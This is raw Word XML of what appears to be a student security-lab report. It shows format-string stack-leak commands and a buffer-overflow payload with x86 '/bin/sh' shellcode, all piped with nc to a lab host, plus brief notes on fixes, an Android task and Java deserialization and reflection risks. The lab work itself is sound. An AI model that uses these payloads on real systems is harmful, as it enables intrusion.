    <w:p w14:paraId="225DAF55" w14:textId="28F05D82" w:rsidR="00C162C1" w:rsidRPr="00C64440" w:rsidRDefault="00C162C1" w:rsidP="00802AF2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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123 $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"A"x1</w:t>
      </w:r>
      <w:r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20</w:t>
      </w:r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') | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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</w:t>
      </w:r>
      <w:r w:rsidR="002A527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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64440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6063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E029AF" w14:textId="55D269C2" w:rsidR="00BC1A76" w:rsidRDefault="00C162C1" w:rsidP="00802AF2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Compare these two. </w:t>
      </w:r>
      <w:r w:rsidR="00060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119 change to 120, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00060B9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>check_authentication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 w:rsidR="00060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crash and not respond.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So,</w:t>
      </w:r>
      <w:r w:rsidR="00060B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="00BC1A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buffer size then is </w:t>
      </w:r>
      <w:r w:rsidR="00BC1A76" w:rsidRPr="00D272A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1</w:t>
      </w:r>
      <w:r w:rsidR="00060B9D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19</w:t>
      </w:r>
      <w:r w:rsidR="00BC1A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06D16F" w14:textId="4E65CDFA" w:rsidR="00803828" w:rsidRDefault="00BC1A76" w:rsidP="00C64440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382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Step3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C64440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BOF the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF825F" w14:textId="77777777" w:rsidR="00C162C1" w:rsidRDefault="00C162C1" w:rsidP="00C162C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr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$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"%.8x."x8') $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"A"x119')| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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C162C1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10.0.2.14 6063</w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D363D35" wp14:editId="74D6CEA0">
            <wp:extent cx="5943600" cy="85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5106" w14:textId="09A6A34A" w:rsidR="00C162C1" w:rsidRDefault="00C162C1" w:rsidP="00C162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last buffer address is 0xbfffc10. We now can use this to do BOF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D30BFF" w14:textId="2EB5B8E8" w:rsidR="00C47CA8" w:rsidRDefault="00C47CA8" w:rsidP="00C162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Ref: What’s a reverse shell </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="000E3B1B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https://www.geeksforgeeks.org/how-to-create-reverse-shells-with-netcat-in-kali-linux/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7CCBA1" w14:textId="4EDD14BA" w:rsidR="00C162C1" w:rsidRDefault="00C162C1" w:rsidP="00C162C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the tutor said on Ed discussion that we should not use reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00C47CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in our tutorial, I found that the shellcode does useful. </w:t>
      </w:r>
      <w:r w:rsidR="002A5270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00C47CA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I use it to obtain the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE93624" w14:textId="0FA90459" w:rsidR="00C47CA8" w:rsidRPr="00C47CA8" w:rsidRDefault="00C47CA8" w:rsidP="00C162C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr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$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"%.8x."x8') $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"\x90"x40,"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80\x90","\x19\xfc\xff\xbf"x15')| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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C47CA8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10.0.2.14 6063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BBCC6" w14:textId="62188CDE" w:rsidR="00C162C1" w:rsidRDefault="00C47CA8" w:rsidP="00C64440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7CA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B6A204A" wp14:editId="47980C80">
            <wp:extent cx="1181422" cy="134845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6174" cy="13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250" w14:textId="3E985F22" w:rsidR="00D272AB" w:rsidRDefault="00D272AB" w:rsidP="00D272A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r w:rsidR="00C679E9"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ting</w:t>
      </w:r>
      <w:r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the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F08406" w14:textId="73E054F5" w:rsidR="00C162C1" w:rsidRDefault="00C162C1" w:rsidP="00C162C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6F0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lastRenderedPageBreak/>
        <w:t>Step1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C162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2A5270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>leaking the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00283E0F" w14:textId="371A59E1" w:rsidR="002A5270" w:rsidRDefault="002A5270" w:rsidP="00C162C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Ref: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00295693">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html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8F6D4D3" w14:textId="5D95B234" w:rsidR="002A5270" w:rsidRPr="00AF477D" w:rsidRDefault="00AF477D" w:rsidP="00C162C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr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"$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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"AAAA","%.8x."x170,"%s"') 123456" |</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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10.0.2.14 6063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76866EBE" w14:textId="06975BD0" w:rsidR="00C162C1" w:rsidRDefault="00AF477D" w:rsidP="00C162C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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</w:pPr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echo "$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-e 'print "AAAA","%.8x."x1</w:t>
      </w:r>
      <w:r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68</w:t>
      </w:r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,"%s"') 123456" |</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF477D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="F2F2F2" w:themeColor="background1" w:themeShade="F2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.14 6063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9FB13" w14:textId="235C477A" w:rsidR="00AF477D" w:rsidRDefault="00AF477D" w:rsidP="00C162C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77D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 w:rsidRPr="00AF477D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will return the password and the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF477D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one will return authenticate3. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262ED14A" w14:textId="44494C6C" w:rsidR="00AF477D" w:rsidRPr="00AF477D" w:rsidRDefault="00AF477D" w:rsidP="00C162C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But I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don’t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know what’s the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F9580" w14:textId="07F973B0" w:rsidR="00060B9D" w:rsidRPr="0085533B" w:rsidRDefault="00C679E9" w:rsidP="00C679E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553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Fixing the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD38FC0" w14:textId="305539C9" w:rsidR="00C679E9" w:rsidRDefault="00C679E9" w:rsidP="00C679E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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i) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C679E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Format string vulnerability</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="1" w:name="_MON_1664207662"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="509699A1" w14:textId="737D733E" w:rsidR="00C679E9" w:rsidRPr="00C679E9" w:rsidRDefault="00C679E9" w:rsidP="00C679E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:object w:dxaOrig="9360" w:dyaOrig="1334" w14:anchorId="45383B9C">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:66.65pt" o:ole="">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.OpenDocumentText.12" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1672771204" r:id="rId20"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E13F4" w14:textId="4FF65F65" w:rsidR="00C679E9" w:rsidRDefault="00C679E9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79E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ii)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BOF</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_MON_1664207774"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="39B6885F" w14:textId="5623276A" w:rsidR="00C679E9" w:rsidRDefault="00C679E9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object w:dxaOrig="9360" w:dyaOrig="491" w14:anchorId="75F0F140">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:468pt;height:24.65pt" o:ole="">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.OpenDocumentText.12" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1672771205" r:id="rId22"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DABECE5" w14:textId="67ABC96F" w:rsidR="00AF477D" w:rsidRDefault="00AF477D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5B82A9" w14:textId="0AB4CBD8" w:rsidR="00AF477D" w:rsidRPr="00F1783A" w:rsidRDefault="00AF477D" w:rsidP="00C679E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78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F1783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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F178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sk 2</w:t>
      </w:r>
      <w:r w:rsidR="00F1783A" w:rsidRPr="00F178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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F10335" w14:textId="5F1BC2E3" w:rsidR="00AF477D" w:rsidRDefault="00AF477D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 started this assignment too late and I have no experience with android program</w:t>
      </w:r>
      <w:r w:rsidR="00F17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&amp; few experience with JAVA before, so I only work out a little part of it. The material in week 4 &amp; 5 lecture and week 5 &amp; 6 tutorial lab are useful, but I do not have enough time to implement them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5EB94" w14:textId="7C9572ED" w:rsidR="00F1783A" w:rsidRDefault="00F1783A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Here the only functionality that I add to the project:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="3" w:name="_MON_1664293115"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="35B03233" w14:textId="4382A7FE" w:rsidR="00F1783A" w:rsidRDefault="00F1783A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object w:dxaOrig="9360" w:dyaOrig="3279" w14:anchorId="2DD85459">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:468pt;height:164pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Word.OpenDocumentText.12" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1672771206" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF6C90" w14:textId="2FABF53E" w:rsidR="00AF477D" w:rsidRPr="00F1783A" w:rsidRDefault="00F1783A" w:rsidP="00C679E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783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 2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475148AB" w14:textId="77777777" w:rsidR="00F1783A" w:rsidRDefault="00F1783A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Ref: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F26FC" w14:textId="7447C199" w:rsidR="00AF477D" w:rsidRDefault="00F1783A" w:rsidP="00C679E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Week4 lecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF23BB" w14:textId="5668245C" w:rsidR="0085533B" w:rsidRDefault="00832509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5" w:anchor=":~:text=Description%20This%20vulnerability%20is%20caused%20by%20unsafe%20use,result%20in%20a%20limited%20form%20of%20code%20injection" w:history="1">
        <w:r w:rsidR="00F1783A" w:rsidRPr="007B6E83">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection#:~:text=Description%20This%20vulnerability%20is%20caused%20by%20unsafe%20use,result%20in%20a%20limited%20form%20of%20code%20injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F1783A" w:rsidRPr="00F1783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17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1783A" w:rsidRPr="00F178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Unsafe use of </w:t>
      </w:r>
      <w:r w:rsidR="00D1490A" w:rsidRPr="00F1783A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E85617E" w14:textId="290F98DD" w:rsidR="00F1783A" w:rsidRDefault="00832509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26" w:history="1">
        <w:r w:rsidR="0073514B" w:rsidRPr="007B6E83">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://owasp.org/www-pdf-archive/GOD16-Deserialization.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007351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3514B" w:rsidRPr="0073514B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="007351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3514B" w:rsidRPr="0073514B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deserializ</w:t>
      </w:r>
      <w:r w:rsidR="007351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ation </w:t>
      </w:r>
      <w:r w:rsidR="00D1490A" w:rsidRPr="0073514B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A0acks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309286EC" w14:textId="298041A8" w:rsidR="0073514B" w:rsidRDefault="0073514B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1) Java Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38638A9F" w14:textId="2263A455" w:rsidR="0073514B" w:rsidRDefault="0073514B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we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073514B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ObjectInputStream.readObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0073514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there might have a JAVA deserialization problem. </w:t>
      </w:r>
      <w:r w:rsidR="00D1490A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When we use the malicious data to be the input, the attack may happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A41609" w14:textId="02ECA28A" w:rsidR="00D1490A" w:rsidRDefault="00D1490A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2) Java Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24346A" w14:textId="38117E6B" w:rsidR="00D1490A" w:rsidRDefault="00D1490A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 can’t use Class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newClass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new Class(), so we have to use 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getClass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);.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is an example of Java Reflection. We can use Java Reflection to get metadata, which means that this can also be used by the attackers. We call the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setClass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(input) and give it a malicious input so the attack will happen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B9E73" w14:textId="18DC6E3D" w:rsidR="00D1490A" w:rsidRPr="00C679E9" w:rsidRDefault="00D1490A" w:rsidP="008553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defense it, we can use restrict permissions in security policy. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D1490A" w:rsidRPr="00C679E9"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57110" w14:textId="77777777" w:rsidR="00832509" w:rsidRDefault="00832509" w:rsidP="006073FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5FE8CD5F" w14:textId="77777777" w:rsidR="00832509" w:rsidRDefault="00832509" w:rsidP="00607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347931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01A7D6" w14:textId="6C544598" w:rsidR="006073FC" w:rsidRDefault="006073F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E57613" w14:textId="3BA0859E" w:rsidR="006073FC" w:rsidRDefault="00607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2AA9DB" w14:textId="77777777" w:rsidR="00832509" w:rsidRDefault="00832509" w:rsidP="006073FC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E161FA8" w14:textId="77777777" w:rsidR="00832509" w:rsidRDefault="00832509" w:rsidP="00607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675C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="553431C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827E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BB6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87E53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E00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1644F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="566CDA8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E5E11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F94C086"/>
    <w:lvl w:ilvl="0" w:tplc="83AE3E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A45E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB4E133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E3CD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0CC8AEE"/>
    <w:lvl w:ilvl="0" w:tplc="394CA18A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman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F0"/>
    <w:rsid w:val="000304F0"/>
    <w:rsid w:val="00060B9D"/>
    <w:rsid w:val="000A6473"/>
    <w:rsid w:val="000D7948"/>
    <w:rsid w:val="00134957"/>
    <w:rsid w:val="0019709A"/>
    <w:rsid w:val="001C3381"/>
    <w:rsid w:val="002A5270"/>
    <w:rsid w:val="002C004A"/>
    <w:rsid w:val="0033536A"/>
    <w:rsid w:val="003A59D1"/>
    <w:rsid w:val="005141FE"/>
    <w:rsid w:val="00526023"/>
    <w:rsid w:val="005307AE"/>
    <w:rsid w:val="005418F3"/>
    <w:rsid w:val="006073FC"/>
    <w:rsid w:val="006371CC"/>
    <w:rsid w:val="00681CC8"/>
    <w:rsid w:val="0073514B"/>
    <w:rsid w:val="00802AF2"/>
    <w:rsid w:val="00803828"/>
    <w:rsid w:val="00813843"/>
    <w:rsid w:val="00832509"/>
    <w:rsid w:val="0085533B"/>
    <w:rsid w:val="00896BDF"/>
    <w:rsid w:val="008E5D1B"/>
    <w:rsid w:val="00A25771"/>
    <w:rsid w:val="00A5379B"/>
    <w:rsid w:val="00A91414"/>
    <w:rsid w:val="00A924AE"/>
    <w:rsid w:val="00AC0897"/>
    <w:rsid w:val="00AF477D"/>
    <w:rsid w:val="00AF6F05"/>
    <w:rsid w:val="00B63399"/>
    <w:rsid w:val="00BC1A76"/>
    <w:rsid w:val="00BF2BBE"/>
    <w:rsid w:val="00C1199A"/>
    <w:rsid w:val="00C162C1"/>
    <w:rsid w:val="00C47CA8"/>
    <w:rsid w:val="00C56FBF"/>
    <w:rsid w:val="00C64440"/>
    <w:rsid w:val="00C679E9"/>
    <w:rsid w:val="00C76B6A"/>
    <w:rsid w:val="00C90FA1"/>
    <w:rsid w:val="00D1490A"/>
    <w:rsid w:val="00D272AB"/>
    <w:rsid w:val="00D45266"/>
    <w:rsid w:val="00DD1751"/>
    <w:rsid w:val="00DF150C"/>
    <w:rsid w:val="00E2137E"/>
    <w:rsid w:val="00ED1C4B"/>
    <w:rsid w:val="00F1147F"/>
    <w:rsid w:val="00F1783A"/>
    <w:rsid w:val="00F609E6"/>
    <w:rsid w:val="00F77633"/>
    <w:rsid w:val="00FA5B92"/>
    <w:rsid w:val="00FA6946"/>
    <w:rsid w:val="00FB1DD9"/>
    <w:rsid w:val="00FE0476"/>
    <w:rsid w:val="00FE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FE84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B722F53F-1C99-4519-81D1-67014EBD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304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96B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1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9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FA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7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3FC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00607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3FC"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alt">
    <w:name w:val="alt"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A2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C679E9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="datatypes">
    <w:name w:val="datatypes"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C679E9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C67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18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codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-pdf-archive/GOD16-Deserialization.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hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflec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how-to-create-reverse-shells-with-netcat-in-kali-linux/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2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emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cplusplus.com/reference/cstring/strchr/" TargetMode="Externa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yperlink" Target="https://owasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin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B0AD2-AB2D-49A4-A4C9-1A4ADD21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5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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-09T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-21T13:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>